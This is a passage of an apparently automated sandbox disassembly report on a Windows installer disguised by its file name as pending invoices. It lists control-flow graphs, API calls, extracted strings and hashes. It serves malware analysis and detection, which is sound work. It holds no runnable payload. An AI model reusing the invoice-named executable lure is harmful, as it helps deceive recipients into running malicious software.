296->297 297->220 299 405380 297->299 298->230 300 4053d2-405429 call 4054f5 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401399 298->300 299->218 300->218 305 40542b-40543e ShowWindow call 4054c3 300->305 307 405443 305->307 307->242
                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404FAC
                                  • ShowWindow.USER32(?), ref: 00404FD6
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404FE7
                                  • ShowWindow.USER32(?,00000004), ref: 00405003
                                  • GetDlgItem.USER32(?,00000001), ref: 0040512A
                                  • GetDlgItem.USER32(?,00000002), ref: 00405134
                                  • SetClassLongW.USER32(?,000000F2,?), ref: 0040514E
                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040519C
                                  • GetDlgItem.USER32(?,00000003), ref: 0040524B
                                  • ShowWindow.USER32(00000000,?), ref: 00405274
                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405288
                                  • KiUserCallbackDispatcher.NTDLL(?), ref: 0040529C
                                  • EnableWindow.USER32(?), ref: 004052B4
                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004052CB
                                  • EnableMenuItem.USER32(00000000), ref: 004052D2
                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004052E3
                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004052FA
                                  • lstrlenW.KERNEL32(004211D0,?,004211D0,00000000), ref: 0040532B
                                    • Part of subcall function 00405E95: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00010480,?,?,?,00000000,?,?), ref: 0040604B
                                  • SetWindowTextW.USER32(?,004211D0), ref: 00405343
                                    • Part of subcall function 00401399: MulDiv.KERNEL32(00000011,00007530,00000000), ref: 004013F9
                                    • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                  • DestroyWindow.USER32(?,00000000), ref: 0040538B
                                  • CreateDialogParamW.USER32(?,?,-00429D20), ref: 004053BF
                                    • Part of subcall function 004054F5: SetDlgItemTextW.USER32(?,?,00000000), ref: 0040550F
                                  • GetDlgItem.USER32(?,000003FA), ref: 004053E8
                                  • GetWindowRect.USER32(00000000), ref: 004053EF
                                  • ScreenToClient.USER32(?,?), ref: 004053FB
                                  • SetWindowPos.USER32(00000000,?,?,00000000,00000000,00000015), ref: 00405414
                                  • ShowWindow.USER32(00000008,?,00000000), ref: 00405433
                                    • Part of subcall function 004054C3: SendMessageW.USER32(0001047A,00000000,00000000,00000000), ref: 004054D5
                                  • ShowWindow.USER32(?,0000000A), ref: 00405479
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuTextUser$ClassClientCreateDestroyDialogParamRectScreenSystemlstrcatlstrlen
                                  • String ID:
                                  • API String ID: 162979904-0
                                  • Opcode ID: 2c232c3c4cd4abe9946bd1abf6ab45f170ff85d80f4d9d15ff1c79bd8826187f
                                  • Instruction ID: 1b19c71cd4f81cfbd26a1cf5418529817e88c436646d4b9e8708edd60e3e664c
                                  • Opcode Fuzzy Hash: 2c232c3c4cd4abe9946bd1abf6ab45f170ff85d80f4d9d15ff1c79bd8826187f
                                  • Instruction Fuzzy Hash: C4D1C070601A11AFDB206F21ED48A6B7BA8FB48355F40453EF945B21F0CB399852DFAD
                                  Function 00405A19 Relevance: 42.2, APIs: 13, Strings: 11, Instructions: 225stringregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 308 405a19-405a34 call 4068c1 311 405a36-405a46 call 4065fa 308->311 312 405a48-405a7e call 406952 308->312 321 405aa1-405aca call 40595a call 406613 311->321 317 405a80-405a91 call 406952 312->317 318 405a96-405a9c lstrcatW 312->318 317->318 318->321 326 405ad0-405ad5 321->326 327 405b62-405b6a call 406613 321->327 326->327 328 405adb-405b04 call 406952 326->328 333 405b78-405ba6 LoadImageW 327->333 334 405b6c-405b73 call 405e95 327->334 328->327 335 405b06-405b0c 328->335 337 405c25-405c2d call 401533 333->337 338 405ba8-405bd3 RegisterClassW 333->338 334->333 340 405b0e-405b1c call 4065d1 335->340 341 405b1f-405b2d lstrlenW 335->341 349 405c33-405c3e call 40595a 337->349 350 405cdf-405ce1 337->350 342 405bd5-405bd7 338->342 343 405bdc-405c20 SystemParametersInfoW CreateWindowExW 338->343 340->341 346 405b55-405b5d call 406531 call 406af5 341->346 347 405b2f-405b3d lstrcmpiW 341->347 348 405ce2-405ce9 342->348 343->337 346->327 347->346 353 405b3f-405b49 GetFileAttributesW 347->353 361 405c44-405c5e ShowWindow call 406179 349->361 362 405cc6-405cc7 call 40583f 349->362 350->348 356 405b4b-405b4d 353->356 357 405b4f-405b50 call 406ceb 353->357 356->346 356->357 357->346 369 405c60-405c65 call 406179 361->369 370 405c6a-405c7b GetClassInfoW 361->370 365 405ccc-405cce 362->365 367 405cd0-405cd6 365->367 368 405cea-405cec call 401533 365->368 367->350 371 405cd8-405cda call 401533 367->371 377 405cf1 368->377 369->370 374 405c93-405cb6 DialogBoxParamW call 401533 370->374 375 405c7d-405c91 GetClassInfoW RegisterClassW 370->375 371->350 379 405cbb-405cc4 call 403cd3 374->379 375->374 377->377 379->348
                                  APIs
                                    • Part of subcall function 004068C1: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EB,0000000B), ref: 004068CF
                                    • Part of subcall function 004068C1: GetProcAddress.KERNEL32(00000000), ref: 004068EB
                                  • lstrcatW.KERNEL32(1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000,00000002,00000000,75923420,00000000,75923170), ref: 00405A9C
                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\fanin,1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000,00000002,00000000), ref: 00405B20
                                  • lstrcmpiW.KERNEL32(-000000FC,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\fanin,1033,004211D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004211D0,00000000), ref: 00405B35
                                  • GetFileAttributesW.KERNEL32(Call), ref: 00405B40
                                  • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\fanin), ref: 00405B89
                                    • Part of subcall function 004065FA: wsprintfW.USER32 ref: 00406607
                                  • RegisterClassW.USER32(00428CA0), ref: 00405BCE
                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405BE5
                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C1A
                                  • ShowWindow.USER32(00000005,00000000), ref: 00405C4C
                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00428CA0), ref: 00405C77
                                  • GetClassInfoW.USER32(00000000,RichEdit,00428CA0), ref: 00405C84
                                  • RegisterClassW.USER32(00428CA0), ref: 00405C91
                                  • DialogBoxParamW.USER32(?,00000000,00404F6D,00000000), ref: 00405CAC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\fanin$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                  • API String ID: 1975747703-790534633
                                  • Opcode ID: 7826c34372ab1de799e47c1a445c5beb8b4d289113b4383a7413856266521f1e
                                  • Instruction ID: 997547c739dba09290e01480a6769471c967da196cfb38af9b733d4135fa1862
                                  • Opcode Fuzzy Hash: 7826c34372ab1de799e47c1a445c5beb8b4d289113b4383a7413856266521f1e
                                  • Instruction Fuzzy Hash: 1A610370201601BAE620AB76AD42F2B366CEB04758F51443FF945B62E1DF78AC018B7D
                                  Function 0040154A Relevance: 37.2, APIs: 17, Strings: 4, Instructions: 441stringtimesleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 382 40154a-4015bd 383 402ea1 382->383 384 4015c3-4015c7 382->384 404 402ea5 383->404 385 4016c1-4016cf 384->385 386 4017c2-401e9e call 40303e call 4065aa 384->386 387 401684-4016aa 384->387 388 4015e6-4015ee 384->388 389 4018cb-4018d4 call 40303e call 406a31 384->389 390 40160c-40160d 384->390 391 4015ce-4015d0 384->391 392 4016ef-4016fb call 40303e SetFileAttributesW 384->392 393 4016af-4016bc call 4065fa 384->393 394 40182f-40184b call 40303e GetFullPathNameW 384->394 395 401711-401728 call 40303e call 406ba0 384->395 396 401633-40163a SetForegroundWindow 384->396 397 4017d3-4017f6 call 40303e * 3 MoveFileW 384->397 398 4015d5-4015d6 384->398 399 401618-40162e call 403002 Sleep 384->399 400 4015f9-401607 call 4030fd call 401399 384->400 401 40189b-4018b8 call 40303e SearchPathW 384->401 402 4018de-401904 call 40303e call 406dde 384->402 403 40163f-401645 384->403 413 4016d1-4016d5 ShowWindow 385->413 414 4016d9-4016e0 385->414 479 401bb2-401bb6 386->479 480 401ea4-401ea8 386->480 411 402ead-402eb7 387->411 417 4015f0-4015f7 PostQuitMessage 388->417 418 4015dc-4015e1 388->418 454 4018d9 389->454 425 40160e-401613 call 405d15 390->425 391->411 446 401701-401703 392->446 393->383 444 401857-40185d 394->444 445 40184d-401855 394->445 471 401784-40178e 395->471 472 40172a-40173f call 4065d1 395->472 396->383 482 401804-401808 397->482 483 4017f8-4017ff 397->483 415 4015d7 call 405d15 398->415 399->383 400->411 401->383 450 4018be-4018c6 401->450 466 401906-40190c call 406af5 402->466 467 40190e-401920 call 406af5 call 406531 lstrcatW 402->467 407 401671-40167f 403->407 408 401647 403->408 409 402eab 404->409 407->383 428 401657-40166c call 403002 408->428 429 401649-401650 408->429 409->411 413->414 414->383 432 4016e6-4016ea ShowWindow 414->432 415->418 417->418 418->411 425->383 428->383 429->428 432->383 458 40187b 444->458 459 40185f-401862 444->459 457 40187f-401883 445->457 446->383 460 401709-40170c 446->460 450->404 454->446 457->404 469 401889-401896 GetShortPathNameW 457->469 458->457 459->458 468 401864-40186c call 4065aa 459->468 460->404 490 401925-40192d call 406d18 466->490 467->490 468->445 493 40186e-401876 call 406af5 468->493 469->404 476 401790-4017ab call 405d15 call 406af5 SetCurrentDirectoryW 471->476 477 4017bb-4017bd 471->477 494 401741-401745 472->494 495 401758-401759 call 405df9 472->495 476->383 513 4017b1-4017b6 476->513 477->425 479->411 480->411 482->460 489 40180e-401816 call 4065aa 482->489 483->425 489->460 509 40181c-40182a call 406218 489->509 512 40192e-401931 490->512 493->458 494->495 496 401747-40174e call 4064d7 494->496 505 40175e-401760 495->505 496->495 514 401750-401751 call 405e19 496->514 510 401762-401767 505->510 511 401775-40177e 505->511 509->425 516 401774 510->516 517 401769-401772 GetFileAttributesW 510->517 511->472 518 401780 511->518 519 401933-40193d call 4065aa 512->519 520 401964-401966 512->520 513->383 526 401756 514->526 516->511 517->511 517->516 518->471 530 401950-401960 519->530 531 40193f-40194e CompareFileTime 519->531 524 401968-401969 call 406b78 520->524 525 40196e-401989 call 4068f6 520->525 524->525 533 401a18-401a49 call 405d15 call 403148 525->533 534 40198f-401991 525->534 526->505 530->520 531->530 547 401a52-401a5a SetFileTime 533->547 548 401a4b-401a50 533->548 536 401993-4019df call 406af5 * 2 call 405e95 call 406af5 call 406a83 534->536 537 4019fd-401a13 call 405d15 534->537 536->512 564 4019e5-4019e8 536->564 537->404 550 401a60-401a6d CloseHandle 547->550 548->547 548->550 550->383 552 401a73-401a76 550->552 554 401a78-401a87 call 405e95 lstrcatW 552->554 555 401a89-401a8c call 405e95 552->555 561 401a91-401a9c call 406a83 554->561 555->561 561->418 561->479 566 4019f2-4019f8 564->566 567 4019ea-4019ed 564->567 566->409 567->415
                                  APIs
                                  • PostQuitMessage.USER32(00000000), ref: 004015F1
                                  • Sleep.KERNEL32(00000001,?,00000000,00000000), ref: 00401628
                                  • SetForegroundWindow.USER32 ref: 00401634
                                  • ShowWindow.USER32(00010486,00000000,?,?,00000000,00000000), ref: 004016D3
                                  • ShowWindow.USER32(00010480,?,?,?,00000000,00000000), ref: 004016E8
                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
                                  • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
                                  • SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\fanin\Leflet,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll), ref: 004017A3
                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                  • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,?,00000000,00000000), ref: 00401843
                                  • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                  • SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\fanin\Leflet,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
                                  • CompareFileTime.KERNEL32(-00000014,00000000,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\fanin\Leflet,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                                  • SetFileTime.KERNELBASE(00000000,000000FF,00000000,000000FF,?,00000000,00000000,00000000,000000EA,00000000,Call,40000000,00000001,Call,00000000), ref: 00401A5A
                                  • CloseHandle.KERNELBASE(00000000), ref: 00401A61
                                  • lstrcatW.KERNEL32(Call,00000000,Call,000000E9), ref: 00401A82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                  • String ID: C:\Users\user\AppData\Local\Temp\fanin\Leflet$C:\Users\user\AppData\Local\Temp\nsnC132.tmp$C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll$Call
                                  • API String ID: 3895412863-1220021032
                                  • Opcode ID: 238787bc3330ffadc63c006c1272a0d69737eff9e1560c5150495ef8301945b7
                                  • Instruction ID: ebeff723cfbe9b45e3b0b0a6f17a4e6c0cbf30734010ce9bbeaf93aeca8f714e
                                  • Opcode Fuzzy Hash: 238787bc3330ffadc63c006c1272a0d69737eff9e1560c5150495ef8301945b7
                                  • Instruction Fuzzy Hash: 93D1F971614301ABC720BF26CD85D2B76A8EF85758F10463FF452B22E1DB7CD8029A6E
                                  Function 004033C8 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 178memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 568 4033c8-403415 GetTickCount GetModuleFileNameW call 4068f6 571 403421-403451 call 406af5 call 406ceb call 406af5 GetFileSize 568->571 572 403417-40341c 568->572 580 403457 571->580 581 40354d-40355c call 403364 571->581 573 403620-403627 572->573 582 40345b-403481 call 40311b 580->582 586 403562-403564 581->586 587 40361b 581->587 591 403613-40361a call 403364 582->591 592 403487-40348e 582->592 589 403595-4035c5 GlobalAlloc call 403131 call 403148 586->589 590 403566-40357e call 403131 call 406923 586->590 587->573 589->587 618 4035c7-4035d9 589->618 610 403583-403585 590->610 591->587 596 403490-4034a9 call 40668f 592->596 597 40350f-403512 592->597 600 40351c-403522 596->600 614 4034ab-4034b3 596->614 599 403514-40351b call 403364 597->599 597->600 599->600 606 403524-403533 call 406e17 600->606 607 403537-40353f 600->607 606->607 607->582 615 403545-403549 607->615 610->587 616 40358b-40358f 610->616 614->600 619 4034b5-4034bd 614->619 615->581 616->587 616->589 620 4035e1-4035e4 618->620 621 4035db 618->621 619->600 622 4034bf-4034c7 619->622 624 4035e7-4035ef 620->624 621->620 622->600 623 4034c9-4034d1 622->623 623->600 626 4034d3-4034f2 623->626 624->624 625 4035f1-40360a SetFilePointer call 40668f 624->625 630 40360f-403611 625->630 626->587 627 4034f8-4034fe 626->627 627->615 629 403500-403509 627->629 629->600 631 40350b-40350d 629->631 630->573 631->600
                                  APIs
                                  • GetTickCount.KERNEL32 ref: 004033DB
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,00000400,?,?,?,?,?), ref: 004033F7
                                    • Part of subcall function 004068F6: GetFileAttributesW.KERNELBASE(00000003,0040340A,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 004068FA
                                    • Part of subcall function 004068F6: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040691A
                                  • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 00403441
                                  • GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?), ref: 0040359B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                  • String ID: C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                  • API String ID: 2803837635-970504228
                                  • Opcode ID: af579b943b1a820c08da397bdaa69b1d5dd35135494c3e1d3694e7b1604b832a
                                  • Instruction ID: a22a3d629960f4d7b6f8438a3768dc05bd31f949a9b5a180d7de35419ae1bb07
                                  • Opcode Fuzzy Hash: af579b943b1a820c08da397bdaa69b1d5dd35135494c3e1d3694e7b1604b832a
                                  • Instruction Fuzzy Hash: 2B51EE71640300AFD720AF21DD81B1B7AA8AB88719F10493FF985772E1C7398E458B6E
                                  Function 00405E95 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 632 405e95-405e9e 633 405ea0-405eaf 632->633 634 405eb1-405ecc 632->634 633->634 635 405ee3-405eea 634->635 636 405ece-405ed9 634->636 638 405ef0-405ef3 635->638 639 4060de-4060e5 635->639 636->635 637 405edb-405edf 636->637 637->635 640 405ef4-405f02 638->640 641 4060f0 639->641 642 4060e7-4060ee call 406af5 639->642 643 405f08-405f13 640->643 644 4060d9-4060dd 640->644 646 4060f2-4060f8 641->646 642->646 647 4060b2 643->647 648 405f19-405f5d 643->648 644->639 650 4060c0 647->650 651 4060b4-4060be 647->651 652 405f63-405f74 648->652 653 40605d-406060 648->653 654 4060c3 650->654 651->654 657 405fb4-405fb7 652->657 658 405f76-405f94 call 406952 652->658 655 406062-406065 653->655 656 406096-406099 653->656 663 4060c5-4060d3 654->663 661 406075-40608c call 406af5 655->661 662 406067-406073 call 4065fa 655->662 665 4060a4-4060b0 lstrlenW 656->665 666 40609b-40609f call 405e95 656->666 659 405fc7-405fca 657->659 660 405fb9-405fc5 GetSystemDirectoryW 657->660 673 405f99-405fa2 658->673 669 405fda-405fe2 659->669 670 405fcc-405fd8 GetWindowsDirectoryW 659->670 668 406035 660->668 661->665 682 40608e-406094 call 406d18 661->682 662->665 663->640 663->644 665->663 666->665 678 406039-40603e 668->678 674 405fe4-405fed 669->674 675 405ff9-40600f SHGetSpecialFolderLocation 669->675 670->668 673->678 679 405fa8-405faf call 405e95 673->679 688 405ff5-405ff7 674->688 680 406011-40602a SHGetPathFromIDListW CoTaskMemFree 675->680 681 40602c-406033 675->681 683 406040-406043 678->683 684 406051-40605b call 406d18 678->684 679->678 680->668 680->681 681->668 681->669 682->665 683->684 690 406045-40604b lstrcatW 683->690 684->665 688->668 688->675 690->684
                                  APIs
                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00405FBF
                                    • Part of subcall function 00406AF5: lstrcpynW.KERNEL32(?,?,00000400,0040384C,Tolkningen Setup,NSIS Error), ref: 00406B02
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406D8D
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,?,?,00000000), ref: 00406D9C
                                    • Part of subcall function 00406D18: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DA1
                                    • Part of subcall function 00406D18: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8C,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406DB9
                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00010480,?,?,?,00000000,?,?), ref: 00405FD2
                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00010480,?,?,?,00000000,?,?), ref: 0040604B
                                  • lstrlenW.KERNEL32(Call,Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll,?,00010480,?,?,?,00000000,?,?), ref: 004060A5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2240429091.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2240417305.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240445484.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240462967.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2240560548.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsnC132.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                  • API String ID: 4187626192-1720829553
                                  • Opcode ID: e881fb0b28361bdc3f8f7ae5213684426e418320bb2e4e194c901d83aeea876e
